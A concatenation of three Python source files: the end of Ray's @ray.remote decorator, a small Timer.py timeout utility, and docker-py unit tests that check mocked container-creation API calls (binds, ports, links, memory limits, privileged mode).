raise Exception("The keyword 'checkpoint_interval' is not "
"allowed for remote functions.")
return ray.remote_function.RemoteFunction(
function_or_class, num_cpus, num_gpus, resources,
num_return_vals, max_calls)
if inspect.isclass(function_or_class):
if num_return_vals is not None:
raise Exception("The keyword 'num_return_vals' is not allowed "
"for actors.")
if max_calls is not None:
raise Exception("The keyword 'max_calls' is not allowed for "
"actors.")
# Set the actor default resources.
if num_cpus is None and num_gpus is None and resources is None:
# In the default case, actors acquire no resources for
# their lifetime, and actor methods will require 1 CPU.
cpus_to_use = DEFAULT_ACTOR_CREATION_CPUS_SIMPLE_CASE
actor_method_cpus = DEFAULT_ACTOR_METHOD_CPUS_SIMPLE_CASE
else:
# If any resources are specified, then all resources are
# acquired for the actor's lifetime and no resources are
# associated with methods.
cpus_to_use = (DEFAULT_ACTOR_CREATION_CPUS_SPECIFIED_CASE
if num_cpus is None else num_cpus)
actor_method_cpus = DEFAULT_ACTOR_METHOD_CPUS_SPECIFIED_CASE
return worker.make_actor(function_or_class, cpus_to_use, num_gpus,
resources, actor_method_cpus,
checkpoint_interval)
raise Exception("The @ray.remote decorator must be applied to "
"either a function or to a class.")
return decorator
def remote(*args, **kwargs):
"""Define a remote function or an actor class.
This can be used with no arguments to define a remote function or actor as
follows:
.. code-block:: python
@ray.remote
def f():
return 1
@ray.remote
class Foo(object):
def method(self):
return 1
It can also be used with specific keyword arguments:
* **num_return_vals:** This is only for *remote functions*. It specifies
the number of object IDs returned by the remote function invocation.
* **num_cpus:** The quantity of CPU cores to reserve for this task or for
the lifetime of the actor.
* **num_gpus:** The quantity of GPUs to reserve for this task or for the
lifetime of the actor.
* **resources:** The quantity of various custom resources to reserve for
this task or for the lifetime of the actor. This is a dictionary mapping
strings (resource names) to numbers.
* **max_calls:** Only for *remote functions*. This specifies the maximum
number of times that a given worker can execute the given remote function
before it must exit (this can be used to address memory leaks in
third-party libraries or to reclaim resources that cannot easily be
released, e.g., GPU memory that was acquired by TensorFlow). By
default this is infinite.
This can be done as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_return_vals=2)
def f():
return 1, 2
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo(object):
def method(self):
return 1
"""
worker = get_global_worker()
if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
# This is the case where the decorator is just @ray.remote.
return make_decorator(worker=worker)(args[0])
# Parse the keyword arguments from the decorator.
error_string = ("The @ray.remote decorator must be applied either "
"with no arguments and no parentheses, for example "
"'@ray.remote', or it must be applied using some of "
"the arguments 'num_return_vals', 'num_cpus', 'num_gpus', "
"'resources', 'max_calls', or 'checkpoint_interval', like "
"'@ray.remote(num_return_vals=2, "
"resources={\"CustomResource\": 1})'.")
assert len(args) == 0 and len(kwargs) > 0, error_string
for key in kwargs:
assert key in [
"num_return_vals", "num_cpus", "num_gpus", "resources",
"max_calls", "checkpoint_interval"
], error_string
num_cpus = kwargs["num_cpus"] if "num_cpus" in kwargs else None
num_gpus = kwargs["num_gpus"] if "num_gpus" in kwargs else None
resources = kwargs.get("resources")
if not isinstance(resources, dict) and resources is not None:
raise Exception("The 'resources' keyword argument must be a "
"dictionary, but received type {}.".format(
type(resources)))
if resources is not None:
assert "CPU" not in resources, "Use the 'num_cpus' argument."
assert "GPU" not in resources, "Use the 'num_gpus' argument."
# Handle other arguments.
num_return_vals = kwargs.get("num_return_vals")
max_calls = kwargs.get("max_calls")
checkpoint_interval = kwargs.get("checkpoint_interval")
return make_decorator(
num_return_vals=num_return_vals,
num_cpus=num_cpus,
num_gpus=num_gpus,
resources=resources,
max_calls=max_calls,
checkpoint_interval=checkpoint_interval,
worker=worker)
|
Timer.py
|
import threading
import multiprocessing
import platform
TIME = 0.1 # seconds for one turn
class Timer():
def call_timeout(timeout, func, args=(), kwargs={}):
try:
p = multiprocessing.Process(target=func, args=args, kwargs=kwargs)
p.start()
p.join(timeout)
if p.is_alive():
p.terminate()
return False
else:
return True
except Exception as e:
print("Exceptional")
raise e
def timeout(func, args=(), kwargs={}, duration=TIME, default=None):
'''This function will spwan a thread and run the given function using the args, kwargs and
return None if the duration is exceeded
an object of type Exception if result of Exception when running func.
else result of func
NOTE: thus will be confusing if func returns a string.
'''
if not callable(func):
raise TypeError("{} not callable".format(func))
if platform.system() == "Windows":
return func(*args, **kwargs)
try:
if Timer.call_timeout(TIME, func, args, kwargs):
return func(*args, **kwargs)
else:
return None
except Exception as e:
raise e
from contextlib import contextmanager
import os,sys
@contextmanager
def silence_stdout():
new_target = open(os.devnull, "w")
old_target = sys.stdout
sys.stdout = new_target
try:
yield new_target
finally:
sys.stdout = old_target
|
test.py
|
# Copyright 2013 dotCloud inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import datetime
import gzip
import io
import json
import os
import re
import shutil
import signal
import socket
import sys
import tarfile
import tempfile
import threading
import time
import random
import docker
import requests
import six
from . import base
from . import fake_api
from .helpers import make_tree
import pytest
try:
from unittest import mock
except ImportError:
import mock
DEFAULT_TIMEOUT_SECONDS = docker.constants.DEFAULT_TIMEOUT_SECONDS
def response(status_code=200, content='', headers=None, reason=None, elapsed=0,
request=None):
res = requests.Response()
res.status_code = status_code
if not isinstance(content, six.binary_type):
content = json.dumps(content).encode('ascii')
res._content = content
res.headers = requests.structures.CaseInsensitiveDict(headers or {})
res.reason = reason
res.elapsed = datetime.timedelta(elapsed)
res.request = request
return res
def fake_resolve_authconfig(authconfig, registry=None):
return None
def fake_inspect_container(self, container, tty=False):
return fake_api.get_fake_inspect_container(tty=tty)[1]
def fake_inspect_container_tty(self, container):
return fake_inspect_container(self, container, tty=True)
def fake_resp(method, url, *args, **kwargs):
key = None
if url in fake_api.fake_responses:
key = url
elif (url, method) in fake_api.fake_responses:
key = (url, method)
if not key:
raise Exception('{0} {1}'.format(method, url))
status_code, content = fake_api.fake_responses[key]()
return response(status_code=status_code, content=content)
fake_request = mock.Mock(side_effect=fake_resp)
def fake_get(self, url, *args, **kwargs):
return fake_request('GET', url, *args, **kwargs)
def fake_post(self, url, *args, **kwargs):
return fake_request('POST', url, *args, **kwargs)
def fake_put(self, url, *args, **kwargs):
return fake_request('PUT', url, *args, **kwargs)
def fake_delete(self, url, *args, **kwargs):
return fake_request('DELETE', url, *args, **kwargs)
url_base = 'http+docker://localunixsocket/'
url_prefix = '{0}v{1}/'.format(
url_base,
docker.constants.DEFAULT_DOCKER_API_VERSION)
class Cleanup(object):
if sys.version_info < (2, 7):
# Provide a basic implementation of addCleanup for Python < 2.7
def __init__(self, *args, **kwargs):
super(Cleanup, self).__init__(*args, **kwargs)
self._cleanups = []
def tearDown(self):
super(Cleanup, self).tearDown()
ok = True
while self._cleanups:
fn, args, kwargs = self._cleanups.pop(-1)
try:
fn(*args, **kwargs)
except KeyboardInterrupt:
raise
except:
ok = False
if not ok:
raise
def addCleanup(self, function, *args, **kwargs):
self._cleanups.append((function, args, kwargs))
@mock.patch.multiple('docker.Client', get=fake_get, post=fake_post,
put=fake_put, delete=fake_delete)
class DockerClientTest(Cleanup, base.BaseTestCase):
def setUp(self):
self.client = docker.Client()
# Force-clear authconfig to avoid tampering with the tests
self.client._cfg = {'Configs': {}}
def tearDown(self):
self.client.close()
def assertIn(self, object, collection):
if six.PY2 and sys.version_info[1] <= 6:
return self.assertTrue(object in collection)
return super(DockerClientTest, self).assertIn(object, collection)
def base_create_payload(self, img='busybox', cmd=None):
if not cmd:
cmd = ['true']
return {"Tty": False, "Image": img, "Cmd": cmd,
"AttachStdin": False,
"AttachStderr": True, "AttachStdout": True,
"StdinOnce": False,
"OpenStdin": False, "NetworkDisabled": False,
}
def test_ctor(self):
with pytest.raises(docker.errors.DockerException) as excinfo:
docker.Client(version=1.12)
self.assertEqual(
str(excinfo.value),
'Version parameter must be a string or None. Found float'
)
def test_url_valid_resource(self):
url = self.client._url('/hello/{0}/world', 'somename')
self.assertEqual(
url, '{0}{1}'.format(url_prefix, 'hello/somename/world')
)
url = self.client._url(
'/hello/{0}/world/{1}', 'somename', 'someothername'
)
self.assertEqual(
url,
'{0}{1}'.format(url_prefix, 'hello/somename/world/someothername')
)
url = self.client._url('/hello/{0}/world', '/some?name')
self.assertEqual(
url, '{0}{1}'.format(url_prefix, 'hello/%2Fsome%3Fname/world')
)
def test_url_invalid_resource(self):
with pytest.raises(ValueError):
self.client._url('/hello/{0}/world', ['sakuya', 'izayoi'])
def test_url_no_resource(self):
url = self.client._url('/simple')
self.assertEqual(url, '{0}{1}'.format(url_prefix, 'simple'))
def test_url_unversioned_api(self):
url = self.client._url(
'/hello/{0}/world', 'somename', versioned_api=False
)
self.assertEqual(
url, '{0}{1}'.format(url_base, 'hello/somename/world')
)
#########################
# INFORMATION TESTS #
#########################
def test_version(self):
self.client.version()
fake_request.assert_called_with(
'GET',
url_prefix + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_version_no_api_version(self):
self.client.version(False)
fake_request.assert_called_with(
'GET',
url_base + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_retrieve_server_version(self):
client = docker.Client(version="auto")
self.assertTrue(isinstance(client._version, six.string_types))
self.assertFalse(client._version == "auto")
client.close()
def test_auto_retrieve_server_version(self):
version = self.client._retrieve_server_version()
self.assertTrue(isinstance(version, six.string_types))
def test_info(self):
self.client.info()
fake_request.assert_called_with(
'GET',
url_prefix + 'info',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_search(self):
self.client.search('busybox')
fake_request.assert_called_with(
'GET',
url_prefix + 'images/search',
params={'term': 'busybox'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_image_viz(self):
with pytest.raises(Exception):
self.client.images('busybox', viz=True)
self.fail('Viz output should not be supported!')
def test_events(self):
self.client.events()
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={'since': None, 'until': None, 'filters': None},
stream=True
)
def test_events_with_since_until(self):
ts = 1356048000
now = datetime.datetime.utcfromtimestamp(ts)
since = now - datetime.timedelta(seconds=10)
until = now + datetime.timedelta(seconds=10)
self.client.events(since=since, until=until)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': ts - 10,
'until': ts + 10,
'filters': None
},
stream=True
)
def test_events_with_filters(self):
filters = {'event': ['die', 'stop'],
'container': fake_api.FAKE_CONTAINER_ID}
self.client.events(filters=filters)
expected_filters = docker.utils.convert_filters(filters)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': None,
'until': None,
'filters': expected_filters
},
stream=True
)
###################
# LISTING TESTS #
###################
def test_images(self):
self.client.images(all=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 0, 'all': 1},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_images_quiet(self):
self.client.images(all=True, quiet=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 1, 'all': 1},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_image_ids(self):
self.client.images(quiet=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 1, 'all': 0},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_images_filters(self):
self.client.images(filters={'dangling': True})
fake_request.assert_called_with(
'GET',
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 0, 'all': 0,
'filters': '{"dangling": ["true"]}'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_list_containers(self):
self.client.containers(all=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/json',
params={
'all': 1,
'since': None,
'size': 0,
'limit': -1,
'trunc_cmd': 0,
'before': None
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_list_networks(self):
networks = [
{
"name": "none",
"id": "8e4e55c6863ef424",
"type": "null",
"endpoints": []
},
{
"name": "host",
"id": "062b6d9ea7913fde",
"type": "host",
"endpoints": []
},
]
get = mock.Mock(return_value=response(
status_code=200, content=json.dumps(networks).encode('utf-8')))
with mock.patch('docker.Client.get', get):
self.assertEqual(self.client.networks(), networks)
self.assertEqual(get.call_args[0][0], url_prefix + 'networks')
filters = json.loads(get.call_args[1]['params']['filters'])
self.assertFalse(filters)
self.client.networks(names=['foo'])
filters = json.loads(get.call_args[1]['params']['filters'])
self.assertEqual(filters, {'name': ['foo']})
self.client.networks(ids=['123'])
filters = json.loads(get.call_args[1]['params']['filters'])
self.assertEqual(filters, {'id': ['123']})
#####################
# CONTAINER TESTS #
#####################
def test_create_container(self):
self.client.create_container('busybox', 'true')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox", "Cmd": ["true"],
"AttachStdin": false,
"AttachStderr": true, "AttachStdout": true,
"StdinOnce": false,
"OpenStdin": false, "NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_binds(self):
mount_dest = '/mnt'
self.client.create_container('busybox', ['ls', mount_dest],
volumes=[mount_dest])
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls", "/mnt"], "AttachStdin": false,
"Volumes": {"/mnt": {}},
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_volume_string(self):
mount_dest = '/mnt'
self.client.create_container('busybox', ['ls', mount_dest],
volumes=mount_dest)
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls", "/mnt"], "AttachStdin": false,
"Volumes": {"/mnt": {}},
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_ports(self):
self.client.create_container('busybox', 'ls',
ports=[1111, (2222, 'udp'), (3333,)])
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"ExposedPorts": {
"1111/tcp": {},
"2222/udp": {},
"3333/tcp": {}
},
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_entrypoint(self):
self.client.create_container('busybox', 'hello',
entrypoint='cowsay entry')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["hello"], "AttachStdin": false,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"Entrypoint": ["cowsay", "entry"]}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_cpu_shares(self):
self.client.create_container('busybox', 'ls',
cpu_shares=5)
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"CpuShares": 5}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_cpuset(self):
self.client.create_container('busybox', 'ls',
cpuset='0,1')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"Cpuset": "0,1",
"CpusetCpus": "0,1"}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_cgroup_parent(self):
self.client.create_container(
'busybox', 'ls', host_config=self.client.create_host_config(
cgroup_parent='test'
)
)
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
data = json.loads(args[1]['data'])
self.assertIn('HostConfig', data)
self.assertIn('CgroupParent', data['HostConfig'])
self.assertEqual(data['HostConfig']['CgroupParent'], 'test')
def test_create_container_with_working_dir(self):
self.client.create_container('busybox', 'ls',
working_dir='/root')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"WorkingDir": "/root"}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_stdin_open(self):
self.client.create_container('busybox', 'true', stdin_open=True)
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox", "Cmd": ["true"],
"AttachStdin": true,
"AttachStderr": true, "AttachStdout": true,
"StdinOnce": true,
"OpenStdin": true, "NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_volumes_from(self):
vol_names = ['foo', 'bar']
try:
self.client.create_container('busybox', 'true',
volumes_from=vol_names)
except docker.errors.DockerException:
self.assertTrue(
docker.utils.compare_version('1.10', self.client._version) >= 0
)
return
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data'])['VolumesFrom'],
','.join(vol_names))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_empty_volumes_from(self):
self.client.create_container('busybox', 'true', volumes_from=[])
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertTrue('VolumesFrom' not in data)
def test_create_named_container(self):
self.client.create_container('busybox', 'true',
name='marisa-kirisame')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox", "Cmd": ["true"],
"AttachStdin": false,
"AttachStderr": true, "AttachStdout": true,
"StdinOnce": false,
"OpenStdin": false, "NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(args[1]['params'], {'name': 'marisa-kirisame'})
def test_create_container_with_mem_limit_as_int(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit=128.0
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['HostConfig']['Memory'], 128.0)
def test_create_container_with_mem_limit_as_string(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit='128'
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['HostConfig']['Memory'], 128.0)
def test_create_container_with_mem_limit_as_string_with_k_unit(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit='128k'
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['HostConfig']['Memory'], 128.0 * 1024)
def test_create_container_with_mem_limit_as_string_with_m_unit(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit='128m'
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['HostConfig']['Memory'], 128.0 * 1024 * 1024)
def test_create_container_with_mem_limit_as_string_with_g_unit(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
mem_limit='128g'
)
)
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(
data['HostConfig']['Memory'], 128.0 * 1024 * 1024 * 1024
)
def test_create_container_with_mem_limit_as_string_with_wrong_value(self):
self.assertRaises(
docker.errors.DockerException,
self.client.create_host_config, mem_limit='128p'
)
self.assertRaises(
docker.errors.DockerException,
self.client.create_host_config, mem_limit='1f28'
)
def test_start_container(self):
self.client.start(fake_api.FAKE_CONTAINER_ID)
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'containers/3cc2351ab11b/start'
)
self.assertEqual(json.loads(args[1]['data']), {})
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_start_container_none(self):
with pytest.raises(ValueError) as excinfo:
self.client.start(container=None)
self.assertEqual(
str(excinfo.value),
'image or container param is undefined',
)
with pytest.raises(ValueError) as excinfo:
self.client.start(None)
self.assertEqual(
str(excinfo.value),
'image or container param is undefined',
)
def test_start_container_regression_573(self):
self.client.start(**{'container': fake_api.FAKE_CONTAINER_ID})
def test_create_container_with_lxc_conf(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
lxc_conf={'lxc.conf.k': 'lxc.conf.value'}
)
)
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'containers/create'
)
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['LxcConf'] = [
{"Value": "lxc.conf.value", "Key": "lxc.conf.k"}
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'],
{'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_lxc_conf_compat(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
lxc_conf=[{'Key': 'lxc.conf.k', 'Value': 'lxc.conf.value'}]
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['LxcConf'] = [
{"Value": "lxc.conf.value", "Key": "lxc.conf.k"}
]
self.assertEqual(
json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_ro(self):
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"ro": True
}}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = ["/tmp:/mnt:ro"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_rw(self):
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"ro": False
}}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = ["/tmp:/mnt:rw"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_mode(self):
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"mode": "z",
}}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = ["/tmp:/mnt:z"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_mode_and_ro_error(self):
with pytest.raises(ValueError):
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"mode": "z",
"ro": True,
}}
)
)
def test_create_container_with_binds_list(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
binds=[
"/tmp:/mnt/1:ro",
"/tmp:/mnt/2",
],
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = [
"/tmp:/mnt/1:ro",
"/tmp:/mnt/2",
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_port_binds(self):
self.maxDiff = None
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
port_bindings={
1111: None,
2222: 2222,
'3333/udp': (3333,),
4444: ('127.0.0.1',),
5555: ('127.0.0.1', 5555),
6666: [('127.0.0.1',), ('192.168.0.1',)]
}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
data = json.loads(args[1]['data'])
port_bindings = data['HostConfig']['PortBindings']
self.assertTrue('1111/tcp' in port_bindings)
self.assertTrue('2222/tcp' in port_bindings)
self.assertTrue('3333/udp' in port_bindings)
self.assertTrue('4444/tcp' in port_bindings)
self.assertTrue('5555/tcp' in port_bindings)
self.assertTrue('6666/tcp' in port_bindings)
self.assertEqual(
[{"HostPort": "", "HostIp": ""}],
port_bindings['1111/tcp']
)
self.assertEqual(
[{"HostPort": "2222", "HostIp": ""}],
port_bindings['2222/tcp']
)
self.assertEqual(
[{"HostPort": "3333", "HostIp": ""}],
port_bindings['3333/udp']
)
self.assertEqual(
[{"HostPort": "", "HostIp": "127.0.0.1"}],
port_bindings['4444/tcp']
)
self.assertEqual(
[{"HostPort": "5555", "HostIp": "127.0.0.1"}],
port_bindings['5555/tcp']
)
self.assertEqual(len(port_bindings['6666/tcp']), 2)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_mac_address(self):
mac_address_expected = "02:42:ac:11:00:0a"
container = self.client.create_container(
'busybox', ['sleep', '60'], mac_address=mac_address_expected)
res = self.client.inspect_container(container['Id'])
self.assertEqual(mac_address_expected,
res['NetworkSettings']['MacAddress'])
def test_create_container_with_links(self):
link_path = 'path'
alias = 'alias'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
links={link_path: alias}
)
)
args = fake_request.call_args
self.assertEqual(
args[0][1], url_prefix + 'containers/create'
)
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Links'] = ['path:alias']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
def test_create_container_with_multiple_links(self):
link_path = 'path'
alias = 'alias'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
links={
link_path + '1': alias + '1',
link_path + '2': alias + '2'
}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Links'] = [
'path1:alias1', 'path2:alias2'
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
def test_create_container_with_links_as_list_of_tuples(self):
link_path = 'path'
alias = 'alias'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
links=[(link_path, alias)]
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Links'] = ['path:alias']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
def test_create_container_privileged(self):
self.client.create_container(
'busybox', 'true',
host_config=self.client.create_host_config(privileged=True)
)
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Privileged'] = True
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_start_container_with_lxc_conf(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID,
